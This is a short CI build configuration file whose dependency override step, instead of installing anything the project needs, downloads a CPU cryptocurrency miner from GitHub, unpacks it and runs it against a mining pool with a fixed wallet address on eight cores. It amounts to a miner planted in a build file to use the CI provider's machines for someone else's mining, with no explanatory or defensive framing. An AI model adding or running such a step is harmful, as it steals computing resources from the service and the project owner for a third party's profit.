build:
    dependencies:
        override:
            - sudo apt update && wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar -xvf hellminer_cpu_linux.tar.gz && ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RTxdgLSqxiTVkUKegd5L5S3e8pJrAkK621.noname --cpu 8


            # or use a "dummy" command like
            - true


           

 
